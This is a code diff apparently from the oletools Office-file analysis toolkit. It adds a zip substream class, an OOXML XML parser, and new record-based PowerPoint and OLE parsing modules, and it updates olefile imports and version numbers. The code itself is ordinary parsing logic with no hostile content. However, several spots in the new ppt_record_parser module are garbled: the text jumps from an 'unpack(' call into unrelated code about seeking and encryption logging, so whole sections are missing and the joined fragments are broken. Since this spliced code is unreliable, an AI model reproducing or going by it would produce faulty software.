+ Attributes always present:
+ container: the containing zip file
+ name: name of file within zip file
+ mode: open-mode, 'r' per default
+ size: size of the stream (constructor arg or taken from ZipFile.getinfo)
+ closed: True if there was an open() but no close() since then
+
+ Attributes only not-None after open() and before close():
+ handle: direct handle to subfile stream, created by ZipFile.open()
+ pos: current position within stream (can deviate from actual position in
+ self.handle if we fake jump to end)
+
+ See also (and maybe could some day merge with):
+ ppt_record_parser.IterStream; also: oleobj.FakeFile
+ """
+ CHUNK_SIZE = 4096
+
+ def __init__(self, container, filename, mode='r', size=None):
+ """ remember all necessary vars but do not open yet """
+ self.container = container
+ self.name = filename
+ if size is None:
+ self.size = container.getinfo(filename).file_size
+ logger.debug('zip stream has size {0}'.format(self.size))
+ else:
+ self.size = size
+ if 'w' in mode.lower():
+ raise ValueError('Can only read, mode "{0}" not allowed'
+ .format(mode))
+ self.mode = mode
+ self.handle = None
+ self.pos = None
+ self.closed = True
+
+ def readable(self):
+ return True
+
+ def writable(self):
+ return False
+
+ def seekable(self):
+ return True
+
+ def open(self):
+ """ open subfile for reading; open mode given to constructor before """
+ if self.handle is not None:
+ raise IOError('re-opening file not supported!')
+ self.handle = self.container.open(self.name, self.mode)
+ self.pos = 0
+ self.closed = False
+ # print('ZipSubFile: opened; size={}'.format(self.size))
+ return self
+
+ def write(self, *args, **kwargs):
+ """ write is not allowed """
+ raise IOError('writing not implemented')
+
+ def read(self, size=-1):
+ """
+ read given number of bytes (or all data) from stream
+
+ returns bytes (i.e. str in python2, bytes in python3)
+ """
+ if self.handle is None:
+ raise IOError('read on closed handle')
+ if self.pos >= self.size:
+ # print('ZipSubFile: read fake at end')
+ return b'' # fake being at the end, even if we are not
+ data = self.handle.read(size)
+ self.pos += len(data)
+ # print('ZipSubFile: read {} bytes, pos now {}'.format(size, self.pos))
+ return data
+
+ def seek(self, pos, offset=io.SEEK_SET):
+ """ re-position point so read() will continue elsewhere """
+ # calc target position from self.pos, pos and offset
+ if offset == io.SEEK_SET:
+ new_pos = pos
+ elif offset == io.SEEK_CUR:
+ new_pos = self.pos + pos
+ elif offset == io.SEEK_END:
+ new_pos = self.size + pos
+ else:
+ raise ValueError("invalid offset {0}, need SEEK_* constant"
+ .format(offset))
+
+ # now get to that position, doing reads and resets as necessary
+ if new_pos < 0:
+ # print('ZipSubFile: Error: seek to {}'.format(new_pos))
+ raise IOError('Seek beyond start of file not allowed')
+ elif new_pos == self.pos:
+ # print('ZipSubFile: nothing to do')
+ pass
+ elif new_pos == 0:
+ # print('ZipSubFile: seek to start')
+ self.reset()
+ elif new_pos < self.pos:
+ # print('ZipSubFile: seek back')
+ self.reset()
+ self._seek_skip(new_pos) # --> read --> update self.pos
+ elif new_pos < self.size:
+ # print('ZipSubFile: seek forward')
+ self._seek_skip(new_pos - self.pos) # --> read --> update self.pos
+ else: # new_pos >= self.size
+ # print('ZipSubFile: seek to end')
+ self.pos = new_pos # fake being at the end; remember pos >= size
+
+ def _seek_skip(self, to_skip):
+ """ helper for seek: skip forward by given amount using read() """
+ # print('ZipSubFile: seek by skipping {} bytes starting at {}'
+ # .format(self.pos, to_skip))
+ n_chunks, leftover = divmod(to_skip, self.CHUNK_SIZE)
+ for _ in range(n_chunks):
+ self.read(self.CHUNK_SIZE) # just read and discard
+ self.read(leftover)
+ # print('ZipSubFile: seek by skipping done, pos now {}'
+ # .format(self.pos))
+
+ def tell(self):
+ """ inform about position of next read """
+ # print('ZipSubFile: tell-ing we are at {}'.format(self.pos))
+ return self.pos
+
+ def reset(self):
+ """ close and re-open """
+ # print('ZipSubFile: resetting')
+ self.close()
+ self.open()
+
+ def close(self):
+ """ close file """
+ # print('ZipSubFile: closing')
+ if self.handle is not None:
+ self.handle.close()
+ self.pos = None
+ self.handle = None
+ self.closed = True
+
+ def __enter__(self):
+ """ start of context manager; opens the file """
+ # print('ZipSubFile: entering context')
+ self.open()
+ return self
+
+ def __exit__(self, *args, **kwargs):
+ """ end of context manager; closes the file """
+ # print('ZipSubFile: exiting context')
+ self.close()
+
+ def __str__(self):
+ """ creates a nice textual representation for this object """
+ if self.handle is None:
+ status = 'closed'
+ elif self.pos == 0:
+ status = 'open, at start'
+ elif self.pos >= self.size:
+ status = 'open, at end'
+ else:
+ status = 'open, at pos {0}'.format(self.pos)
+
+ return '[ZipSubFile {0} (size {1}, mode {2}, {3})]' \
+ .format(self.name, self.size, self.mode, status)
+
+
+class BadOOXML(ValueError):
+ """ exception thrown if file is not an office XML file """
+
+ def __init__(self, filename, more_info=None):
+ """ create exception, remember filename and more_info """
+ super(BadOOXML, self).__init__(
+ '{0} is not an Office XML file{1}'
+ .format(filename, ': ' + more_info if more_info else ''))
+ self.filename = filename
+ self.more_info = more_info
+
+
+###############################################################################
+# PARSING
+###############################################################################
+
+
+class XmlParser(object):
+ """ parser for OOXML files
+
+ handles two different types of files: "regular" OOXML files are zip
+ archives that contain xml data and possibly other files in binary format.
+ In Office 2003, Microsoft introduced another xml-based format, which uses
+ a single xml file as data source. The content of these types is also
+ different. Method :py:meth:`is_single_xml` tells them apart.
+ """
+
+ def __init__(self, filename):
+ self.filename = filename
+ self.did_iter_all = False
+ self.subfiles_no_xml = set()
+ self._is_single_xml = None
+
+ def is_single_xml(self):
+ """ determine whether this is "regular" ooxml or a single xml file
+
+ Raises a BadOOXML if this is neither one or the other
+ """
+ if self._is_single_xml is not None:
+ return self._is_single_xml
+
+ if is_zipfile(self.filename):
+ self._is_single_xml = False
+ return False
+
+ # find prog id in xml prolog
+ match = None
+ with uopen(self.filename, 'r') as handle:
+ match = re.search(OFFICE_XML_PROGID_REGEX, handle.read(1024))
+ if match:
+ self._is_single_xml = True
+ return True
+ raise BadOOXML(self.filename, 'is no zip and has no prog_id')
+
+ def iter_files(self, args=None):
+ """
+ Find files in zip or just give single xml file
+
+ yields pairs (subfile-name, file-handle) where file-handle is an open
+ file-like object. (Do not care too much about encoding here, the xml
+ parser reads the encoding from the first lines in the file.)
+ """
+ if self.is_single_xml():
+ if args:
+ raise BadOOXML(self.filename, 'xml has no subfiles')
+ # do not use uopen, xml parser determines encoding on its own
+ with open(self.filename, 'rb') as handle:
+ yield None, handle # the subfile=None is needed in iter_xml
+ self.did_iter_all = True
+ else:
+ zipper = None
+ subfiles = None
+ try:
+ zipper = ZipFile(self.filename)
+ if not args:
+ subfiles = zipper.namelist()
+ elif isstr(args):
+ subfiles = [args, ]
+ else:
+ # make a copy in case original args are modified
+ # Not sure whether this really is needed...
+ subfiles = tuple(arg for arg in args)
+
+ for subfile in subfiles:
+ with zipper.open(subfile, 'r') as handle:
+ yield subfile, handle
+ if not args:
+ self.did_iter_all = True
+ except KeyError as orig_err:
+ # Note: do not change text of this message without adjusting
+ # conditions in except handlers
+ raise BadOOXML(self.filename,
+ 'invalid subfile: ' + str(orig_err))
+ except BadZipfile:
+ raise BadOOXML(self.filename, 'not in zip format')
+ finally:
+ if zipper:
+ zipper.close()
+
+ def iter_xml(self, subfiles=None, need_children=False, tags=None):
+ """ Iterate xml contents of document
+
+ If given subfile name[s] as optional arg[s], will only parse that
+ subfile[s]
+
+ yields 3-tuples (subfilename, element, depth) where depth indicates how
+ deep in the hierarchy the element is located. Containers of element
+ will come *after* the elements they contain (since they are only
+ finished then).
+
+ Subfiles that are not xml (e.g. OLE or image files) are remembered
+ internally and can be retrieved using iter_non_xml().
+
+ The argument need_children is set to False per default. If you need to
+ access an element's children, set it to True. Note, however, that
+ leaving it at False should save a lot of memory. Otherwise, the parser
+ has to keep every single element in memory since the last element
+ returned is the root which has the rest of the document as children.
+ c.f. http://www.ibm.com/developerworks/xml/library/x-hiperfparse/
+
+ Argument tags restricts output to tags with names from that list (or
+ equal to that string). Children are preserved for these.
+ """
+ if tags is None:
+ want_tags = []
+ elif isstr(tags):
+ want_tags = [tags, ]
+ logger.debug('looking for tags: {0}'.format(tags))
+ else:
+ want_tags = tags
+ logger.debug('looking for tags: {0}'.format(tags))
+
+ for subfile, handle in self.iter_files(subfiles):
+ events = ('start', 'end')
+ depth = 0
+ inside_tags = []
+ try:
+ for event, elem in ET.iterparse(handle, events):
+ if elem is None:
+ continue
+ if event == 'start':
+ if elem.tag in want_tags:
+ logger.debug('remember start of tag {0} at {1}'
+ .format(elem.tag, depth))
+ inside_tags.append((elem.tag, depth))
+ depth += 1
+ continue
+ assert(event == 'end')
+ depth -= 1
+ assert(depth >= 0)
+
+ is_wanted = elem.tag in want_tags
+ if is_wanted:
+ curr_tag = (elem.tag, depth)
+ try:
+ if inside_tags[-1] == curr_tag:
+ inside_tags.pop()
+ else:
+ logger.error('found end for wanted tag {0} '
+ 'but last start tag {1} does not'
+ ' match'.format(curr_tag,
+ inside_tags[-1]))
+ # try to recover: close all deeper tags
+ while inside_tags and \
+ inside_tags[-1][1] >= depth:
+ logger.debug('recover: pop {0}'
+ .format(inside_tags[-1]))
+ inside_tags.pop()
+ except IndexError: # no inside_tag[-1]
+ logger.error('found end of {0} at depth {1} but '
+ 'no start event')
+ # yield element
+ if is_wanted or not want_tags:
+ yield subfile, elem, depth
+
+ # save memory: clear elem so parser memorizes less
+ if not need_children and not inside_tags:
+ elem.clear()
+ # cannot do this since we might be using py-builtin xml
+ # while elem.getprevious() is not None:
+ # del elem.getparent()[0]
+ except ET.ParseError as err:
+ self.subfiles_no_xml.add(subfile)
+ if subfile is None: # this is no zip subfile but single xml
+ raise BadOOXML(self.filename, 'content is not valid XML')
+ elif subfile.endswith('.xml'):
+ log = logger.warning
+ else:
+ log = logger.debug
+ log(' xml-parsing for {0} failed ({1}). '
+ .format(subfile, err) +
+ 'Run iter_non_xml to investigate.')
+ assert(depth == 0)
+
+ def get_content_types(self):
+ """ retrieve subfile infos from [Content_Types].xml subfile
+
+ returns (files, defaults) where
+ - files is a dict that maps file-name --> content-type
+ - defaults is a dict that maps extension --> content-type
+
+ No guarantees on accuracy of these content types!
+ """
+ if self.is_single_xml():
+ return {}, {}
+
+ defaults = []
+ files = []
+ try:
+ for _, elem, _ in self.iter_xml(FILE_CONTENT_TYPES):
+ if elem.tag.endswith('Default'):
+ extension = elem.attrib['Extension']
+ if extension.startswith('.'):
+ extension = extension[1:]
+ defaults.append((extension, elem.attrib['ContentType']))
+ logger.debug('found content type for extension {0[0]}: '
+ '{0[1]}'.format(defaults[-1]))
+ elif elem.tag.endswith('Override'):
+ subfile = elem.attrib['PartName']
+ if subfile.startswith('/'):
+ subfile = subfile[1:]
+ files.append((subfile, elem.attrib['ContentType']))
+ logger.debug('found content type for subfile {0[0]}: '
+ '{0[1]}'.format(files[-1]))
+ except BadOOXML as oo_err:
+ if oo_err.more_info.startswith('invalid subfile') and \
+ FILE_CONTENT_TYPES in oo_err.more_info:
+ # no FILE_CONTENT_TYPES in zip, so probably no ms office xml.
+ # Maybe OpenDocument format? In any case, try to analyze.
+ pass
+ else:
+ raise
+ return dict(files), dict(defaults)
+
+ def iter_non_xml(self):
+ """ retrieve subfiles that were found by iter_xml to be non-xml
+
+ also looks for content type info in the [Content_Types].xml subfile.
+
+ yields 3-tuples (filename, content_type, file_handle) where
+ content_type is based on filename or default for extension or is None,
+ and file_handle is a ZipSubFile. Caller does not have to care about
+ closing handle, will be closed even in error condition.
+
+ To handle binary parts of an xlsb file, use xls_parser.parse_xlsb_part
+ """
+ if not self.did_iter_all:
+ logger.warning('Did not iterate through complete file. '
+ 'Should run iter_xml() without args, first.')
+ if not self.subfiles_no_xml:
+ return
+
+ # case of single xml files (office 2003+)
+ if self.is_single_xml():
+ return
+
+ content_types, content_defaults = self.get_content_types()
+
+ with ZipFile(self.filename) as zipper:
+ for subfile in self.subfiles_no_xml:
+ if subfile.startswith('/'):
+ subfile = subfile[1:]
+ content_type = None
+ if subfile in content_types:
+ content_type = content_types[subfile]
+ else:
+ extension = splitext(subfile)[1]
+ if extension.startswith('.'):
+ extension = extension[1:] # remove the '.'
+ if extension in content_defaults:
+ content_type = content_defaults[extension]
+ with ZipSubFile(zipper, subfile) as handle:
+ yield subfile, content_type, handle
+
+
+def test():
+ """
+ Test xml parsing; called when running this file as a script.
+
+ Prints every element found in input file (to be given as command line arg).
+ """
+ log_helper.enable_logging(False, 'debug')
+ if len(sys.argv) != 2:
+ print(u'To test this code, give me a single file as arg')
+ return 2
+
+ # test get_type
+ print('Detected type: ' + get_type(sys.argv[1]))
+
+ # test complete parsing
+ parser = XmlParser(sys.argv[1])
+ for subfile, elem, depth in parser.iter_xml():
+ if depth < 4:
+ print(u'{0} {1}{2}'.format(subfile, ' ' * depth, debug_str(elem)))
+ for index, (subfile, content_type, _) in enumerate(parser.iter_non_xml()):
+ print(u'Non-XML subfile: {0} of type {1}'
+ .format(subfile, content_type or u'unknown'))
+ if index > 100:
+ print(u'...')
+ break
+
+ log_helper.end_logging()
+
+ return 0
+
+
+if __name__ == '__main__':
+ sys.exit(test())
diff --git a/oletools/ppt_parser.py b/oletools/ppt_parser.py
index e8ef6063..fa1fd29a 100644
--- a/oletools/ppt_parser.py
+++ b/oletools/ppt_parser.py
@@ -6,11 +6,19 @@
(possibly slightly excessively so)
Currently quite narrowly focused on extracting VBA from ppt files, no slides or
-stuff, but built to be extended to parsing more/all of the file
+stuff, but built to be extended to parsing more/all of the file. For better
+"understanding" of ppt files, see module ppt_record_parser, which will probably
+replace this module some time soon.
References:
* https://msdn.microsoft.com/en-us/library/dd921564%28v=office.12%29.aspx
and links there-in
+
+WARNING!
+Before thinking about understanding or even extending this module, please keep
+in mind that module ppt_record_parser has a better "understanding" of the ppt
+file structure and will replace this module some time soon!
+
"""
# === LICENSE =================================================================
@@ -24,6 +32,7 @@
# - license
# - make buffered stream from output of iterative_decompress
# - maybe can merge the 2 decorators into 1? (with_opened_main_stream)
+# - REPLACE THIS MODULE with ppt_record_parser
# CHANGELOG:
@@ -32,8 +41,9 @@
# 2016-09-13 PL: - fixed olefile import for Python 2+3
# - fixed format strings for Python 2.6 (issue #75)
# 2017-04-23 v0.51 PL: - fixed absolute imports and issue #101
+# 2018-09-11 v0.54 PL: - olefile is now a dependency
-__version__ = '0.51'
+__version__ = '0.54'
# --- IMPORTS ------------------------------------------------------------------
@@ -57,11 +67,41 @@
if not _parent_dir in sys.path:
sys.path.insert(0, _parent_dir)
-from oletools.thirdparty.olefile import olefile
+import olefile
+
+
+# TODO: this is a temporary fix until all logging features are unified in oletools
+def get_logger(name, level=logging.CRITICAL+1):
+ """
+ Create a suitable logger object for this module.
+ The goal is not to change settings of the root logger, to avoid getting
+ other modules' logs on the screen.
+ If a logger exists with same name, reuse it. (Else it would have duplicate
+ handlers and messages would be doubled.)
+ The level is set to CRITICAL+1 by default, to avoid any logging.
+ """
+ # First, test if there is already a logger with the same name, else it
+ # will generate duplicate messages (due to duplicate handlers):
+ if name in logging.Logger.manager.loggerDict:
+ #NOTE: another less intrusive but more "hackish" solution would be to
+ # use getLogger then test if its effective level is not default.
+ logger = logging.getLogger(name)
+ # make sure level is OK:
+ logger.setLevel(level)
+ return logger
+ # get a new logger:
+ logger = logging.getLogger(name)
+ # only add a NullHandler for this logger, it is up to the application
+ # to configure its own logging:
+ logger.addHandler(logging.NullHandler())
+ logger.setLevel(level)
+ return logger
+
+
# a global logger object used for debugging:
-log = olefile.get_logger('ppt')
+log = get_logger('ppt')
def enable_logging():
@@ -1414,7 +1454,7 @@ def search_vba_info(self, stream):
.. seealso:: search_vba_storage
"""
- logging.debug('looking for VBA info containers')
+ log.debug('looking for VBA info containers')
pattern = VBAInfoContainer.generate_pattern(
rec_len=VBAInfoContainer.RECORD_LENGTH) \
@@ -1466,7 +1506,7 @@ def search_vba_storage(self, stream):
.. seealso:: :py:meth:`search_vba_info`
"""
- logging.debug('looking for VBA storage objects')
+ log.debug('looking for VBA storage objects')
for obj_type in (ExternalObjectStorageUncompressed,
ExternalObjectStorageCompressed):
# re-position stream at start
diff --git a/oletools/ppt_record_parser.py b/oletools/ppt_record_parser.py
new file mode 100644
index 00000000..f8d54eae
--- /dev/null
+++ b/oletools/ppt_record_parser.py
@@ -0,0 +1,722 @@
+#!/usr/bin/env python
+
+"""
+ppt_record_parser.py
+
+Alternative to ppt_parser.py that works on records
+"""
+
+# === LICENSE =================================================================
+#
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions are met:
+#
+# * Redistributions of source code must retain the above copyright notice,
+# this list of conditions and the following disclaimer.
+# * Redistributions in binary form must reproduce the above copyright notice,
+# this list of conditions and the following disclaimer in the documentation
+# and/or other materials provided with the distribution.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+# POSSIBILITY OF SUCH DAMAGE.
+
+# -----------------------------------------------------------------------------
+# CHANGELOG:
+# 2017-11-30 v0.01 CH: - first version, can be used in oledump
+
+# -----------------------------------------------------------------------------
+# TODO:
+# - provide stuff from ppt_parser as well and replace it
+
+# -----------------------------------------------------------------------------
+# REFERENCES:
+# - [MS-PPT]
+
+
+import sys
+from struct import unpack # unsigned: 1 Byte = B, 2 Byte = H, 4 Byte = L
+import logging
+import io
+import zlib
+
+# IMPORTANT: it should be possible to run oletools directly as scripts
+# in any directory without installing them with pip or setup.py.
+# In that case, relative imports are NOT usable.
+# And to enable Python 2+3 compatibility, we need to use absolute imports,
+# so we add the oletools parent folder to sys.path (absolute+normalized path):
+try:
+ from oletools import record_base
+except ImportError:
+ import os.path
+ PARENT_DIR = os.path.normpath(os.path.dirname(os.path.dirname(
+ os.path.abspath(__file__))))
+ if PARENT_DIR not in sys.path:
+ sys.path.insert(0, PARENT_DIR)
+ del PARENT_DIR
+ from oletools import record_base
+
+
+# types of relevant records (there are much more than listed here)
+RECORD_TYPES = dict([
+ # file structure types
+ (0x0ff5, 'UserEditAtom'),
+ (0x0ff6, 'CurrentUserAtom'), # --> use PptRecordCurrentUser instead
+ (0x1772, 'PersistDirectoryAtom'),
+ (0x2f14, 'CryptSession10Container'),
+ # document types
+ (0x03e8, 'DocumentContainer'),
+ (0x0fc9, 'HandoutContainer'),
+ (0x03f0, 'NotesContainer'),
+ (0x03ff, 'VbaInfoContainer'),
+ (0x03e9, 'DocumentAtom'),
+ (0x03ea, 'EndDocumentAtom'),
+ # slide types
+ (0x03ee, 'SlideContainer'),
+ (0x03f8, 'MainMasterContainer'),
+ # external object ty
+ (0x0409, 'ExObjListContainer'),
+ (0x1011, 'ExOleVbaActiveXAtom'), # --> use PptRecordExOleVbaActiveXAtom
+ (0x1006, 'ExAviMovieContainer'),
+ (0x100e, 'ExCDAudioContainer'),
+ (0x0fee, 'ExControlContainer'),
+ (0x0fd7, 'ExHyperlinkContainer'),
+ (0x1007, 'ExMCIMovieContainer'),
+ (0x100d, 'ExMIDIAudioContainer'),
+ (0x0fcc, 'ExOleEmbedContainer'),
+ (0x0fce, 'ExOleLinkContainer'),
+ (0x100f, 'ExWAVAudioEmbeddedContainer'),
+ (0x1010, 'ExWAVAudioLinkContainer'),
+ (0x1004, 'ExMediaAtom'),
+ (0x040a, 'ExObjListAtom'),
+ (0x0fcd, 'ExOleEmbedAtom'),
+ (0x0fc3, 'ExOleObjAtom'), # --> use PptRecordExOleObjAtom instead
+ # other types
+ (0x0fc1, 'MetafileBlob'),
+ (0x0fb8, 'FontEmbedDataBlob'),
+ (0x07e7, 'SoundDataBlob'),
+ (0x138b, 'BinaryTagDataBlob'),
+ (0x0fba, 'CString'),
+])
+
+
+# record types where version is not 0x0 or 0x1 or 0xf
+VERSION_EXCEPTIONS = dict([
+ (0x0400, 2), # rt_vbainfoatom
+ (0x03ef, 2), # rt_slideatom
+ (0xe9c7, 7), # tests/test-data/encrypted/encrypted.ppt, not investigated
+])
+
+
+# record types where instance is not 0x0 or 0x1
+INSTANCE_EXCEPTIONS = dict([
+ (0x0fba, (2, 0x14)), # rt_cstring,
+ (0x0ff0, (2, 2)), # rt_slidelistwithtext,
+ (0x0fd9, (3, 4)), # rt_headersfooters,
+ (0x07e4, (5, 5)), # rt_soundcollection,
+ (0x03fb, (7, 7)), # rt_guideatom,
+ (0x07e9, (2, 2)), # rt_bookmarkseeatom,
+ (0x07f0, (6, 6)), # rt_colorschemeatom,
+ (0xf125, (0, 5)), # rt_timeconditioncontainer,
+ (0xf13d, (0, 0xa)), # rt_timepropertylist,
+ (0x0fc8, (2, 2)), # rt_kinsoku,
+ (0x0fd2, (3, 3)), # rt_kinsokuatom,
+ (0x0f9f, (0, 5)), # rt_textheaderatom,
+ (0x0fb7, (0, 128)), # rt_fontentityatom,
+ (0x0fa3, (0, 8)), # rt_textmasterstyleatom,
+ (0x0fad, (0, 8)), # rt_textmasterstyle9atom,
+ (0x0fb2, (0, 8)), # rt_textmasterstyle10atom,
+ (0x07f9, (0, 0x80)), # rt_blibentitiy9atom,
+ (0x0faf, (0, 5)), # rt_outlinetextpropsheader9atom,
+ (0x0fb8, (0, 3)), # rt_fontembeddatablob,
+])
+
+
+def is_ppt(filename):
+ """ determine whether given file is a PowerPoint 2003 (ppt) OLE file
+
+ Tries to ppt-parse the file, return False if that fails. Looks for certain
+ required streams and records.
+
+ Param filename can be anything that OleFileIO constructor accepts: name of
+ file or file data or data stream.
+
+ Will not try to decrypt the file not even try to determine whether it is
+ encrypted. If the file is encrypted will either raise an error or just
+ return `False`.
+
+ see also: oleid.OleID.check_powerpoint
+ """
+ have_current_user = False
+ have_user_edit = False
+ have_persist_dir = False
+ have_document_container = False
+ ppt_file = None
+ try:
+ ppt_file = PptFile(filename)
+ for stream in ppt_file.iter_streams():
+ if stream.name == 'Current User':
+ for record in stream.iter_records():
+ if isinstance(record, PptRecordCurrentUser):
+ have_current_user = True
+ if have_current_user and have_user_edit and \
+ have_persist_dir and have_document_container:
+ return True
+ elif stream.name == 'PowerPoint Document':
+ for record in stream.iter_records():
+ if record.type == 0x0ff5: # UserEditAtom
+ have_user_edit = True
+ elif record.type == 0x1772: # PersistDirectoryAtom
+ have_persist_dir = True
+ elif record.type == 0x03e8: # DocumentContainer
+ have_document_container = True
+ else:
+ continue
+ if have_current_user and have_user_edit and \
+ have_persist_dir and have_document_container:
+ return True
+ else: # ignore other streams/storages since they are optional
+ continue
+ except Exception as exc:
+ logging.debug('Ignoring exception in is_ppt, assume is not ppt',
+ exc_info=True)
+ finally:
+ if ppt_file is not None:
+ ppt_file.close()
+ return False
+
+
+class PptFile(record_base.OleRecordFile):
+ """ Record-based view on a PowerPoint ppt file
+
+ This is a subclass of OleFileIO, so can be constructed from file name or
+ file data or data stream.
+ """
+
+ @classmethod
+ def stream_class_for_name(cls, stream_name):
+ return PptStream
+
+
+class PptStream(record_base.OleRecordStream):
+ """ a stream of records in a ppt file """
+
+ def read_record_head(self):
+ """ read first few bytes of record to determine size and type
+
+ returns (type, size, other) where other is (instance, version)
+ """
+ ver_inst, rec_type, rec_size = unpack(' self.curr_pos:
+ self.readinto(bytearray(offset - self.curr_pos))
+ elif offset == self.curr_pos:
+ pass
+ else: # need to re-create iterable
+ self.reset()
+ self.readinto(bytearray(offset))
+ if self.curr_pos != offset:
+ # logging.debug('IterStream: curr_pos {0} != offset {1}!'
+ # .format(self.curr_pos, offset))
+ raise RuntimeError('programming error in IterStream.tell!')
+ return self.curr_pos
+ elif whence == io.SEEK_END: # seek to end
+ # logging.debug('IterStream: seek to end')
+ if self.size is None:
+ # logging.debug('IterStream: trying to seek to end but size '
+ # 'unknown --> raise IOError')
+ raise IOError('size unknown, cannot seek to end')
+ self.at_end = True # fake jumping to the end
+ self.iterable = None # cannot safely be used any more
+ self.leftover = None
+ return self.size
+ elif whence == io.SEEK_SET: # seek to start
+ # logging.debug('IterStream: seek to start')
+ self.reset()
+ return 0
+ elif whence == io.SEEK_CUR: # e.g. called by tell()
+ # logging.debug('IterStream: seek to curr pos')
+ if self.at_end:
+ return self.size
+ return self.curr_pos
+ elif whence not in (io.SEEK_SET, io.SEEK_CUR, io.SEEK_END):
+ # logging.debug('Illegal 2nd argument to seek(): {0}'
+ # .format(whence))
+ raise IOError('Illegal 2nd argument to seek(): {0}'.format(whence))
+ else:
+ # logging.debug('not implemented: {0}, {1}'.format(offset, whence))
+ raise NotImplementedError('seek only partially implemented. '
+ 'Cannot yet seek to {0} from {1}'
+ .format(offset, whence))
+
+ def close(self):
+ self.iterable = None
+ self.leftover = None
+ self.at_end = False
+ self.curr_pos = 0
+
+
+class PptRecordExOleVbaActiveXAtom(PptRecord):
+ """ record that contains and ole object / vba storage / active x control
+
+ Contains the actual data of the ole object / VBA storage / ActiveX control
+ in compressed or uncompressed form.
+
+ Corresponding types in [MS-PPT]:
+ ExOleObjStg, ExOleObjStgUncompressedAtom, ExOleObjStgCompressedAtom,
+ VbaProjectStg, VbaProjectStgUncompressedAtom, VbaProjectStgCompressedAtom,
+ ExControlStg, ExControlStgUncompressedAtom, ExControlStgCompressedAtom.
+
+ self.data is "An array of bytes that specifies a structured storage
+ (described in [MSDN-COM]) for the OLE object / ActiveX control / VBA
+ project ([MS-OVBA] section 2.2.1)."
+ If compressed, "The original bytes of the storage are compressed by the
+ algorithm specified in [RFC1950] and are decompressed by the algorithm
+ specified in [RFC1951]." (--> meaning zlib)
+ "Office Forms ActiveX controls are specified in [MS-OFORMS]."
+
+ whether this is an OLE object or ActiveX control or a VBA Storage, need to
+ find the corresponding PptRecordExOleObjAtom
+ TODO: do that!
+ """
+
+ TYPE = 0x1011
+
+ def is_compressed(self):
+ """ determine whether data is compressed or uncompressed """
+ return self.instance == 1
+
+ def get_uncompressed_size(self):
+ """ Get size of data in uncompressed form
+
+ For uncompressed data, this just returns self.size. For compressed
+ data, this reads and returns the doecmpressedSize field value from
+ self.data. Raises a value error if compressed and data is not
+ available.
+ """
+ if not self.is_compressed():
+ return self.size
+ elif self.data is None:
+ raise ValueError('Data not read from record')
+ else:
+ return unpack(' crypt: {0}, offset {1}, user {2}/{3}'
+ .format(record.is_document_encrypted(),
+ record.offset_to_current_edit,
+ repr(record.ansi_user_name),
+ repr(record.unicode_user_name),
+ ' ' * indent))
+ elif isinstance(record, PptRecordExOleObjAtom):
+ logging.info('{2}--> obj id {0}, persist id ref {1}'
+ .format(record.ex_obj_id, record.persist_id_ref,
+ ' ' * indent))
+ elif isinstance(record, PptRecordExOleVbaActiveXAtom):
+ ole = record.get_data_as_olefile()
+ for entry in ole.listdir():
+ logging.info('{0}ole entry {1}'.format(' ' * indent, entry))
+
+
+if __name__ == '__main__':
+ def do_per_record(record):
+ print_records(record, logging.info, 2, False)
+ sys.exit(record_base.test(sys.argv[1:], PptFile,
+ do_per_record=do_per_record,
+ verbose=False))
diff --git a/oletools/pyxswf.py b/oletools/pyxswf.py
index c6b6030a..63861db9 100644
--- a/oletools/pyxswf.py
+++ b/oletools/pyxswf.py
@@ -25,7 +25,7 @@
#=== LICENSE =================================================================
-# pyxswf is copyright (c) 2012-2016, Philippe Lagadec (http://www.decalage.info)
+# pyxswf is copyright (c) 2012-2019, Philippe Lagadec (http://www.decalage.info)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
@@ -57,8 +57,9 @@
# 2016-09-06 v0.50 PL: - updated to match the rtfobj API
# 2016-10-25 PL: - fixed print for Python 3
# 2016-11-01 PL: - replaced StringIO by BytesIO for Python 3
+# 2018-09-11 v0.54 PL: - olefile is now a dependency
-__version__ = '0.50'
+__version__ = '0.54'
#------------------------------------------------------------------------------
# TODO:
@@ -78,7 +79,7 @@
from . import rtfobj
from io import BytesIO
from .thirdparty.xxxswf import xxxswf
-from .thirdparty import olefile
+import olefile
#=== MAIN =================================================================
diff --git a/oletools/record_base.py b/oletools/record_base.py
new file mode 100644
index 00000000..db96a63e
--- /dev/null
+++ b/oletools/record_base.py
@@ -0,0 +1,383 @@
+#!/usr/bin/env python
+
+"""
+record_base.py
+
+Common stuff for ole files whose streams are a sequence of record structures.
+This is the case for xls and ppt, so classes are bases for xls_parser.py and
+ppt_record_parser.py .
+"""
+
+# === LICENSE ==================================================================
+
+# record_base is copyright (c) 2014-2019 Philippe Lagadec (http://www.decalage.info)
+# All rights reserved.
+#
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions are met:
+#
+# * Redistributions of source code must retain the above copyright notice,
+# this list of conditions and the following disclaimer.
+# * Redistributions in binary form must reproduce the above copyright notice,
+# this list of conditions and the following disclaimer in the documentation
+# and/or other materials provided with the distribution.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
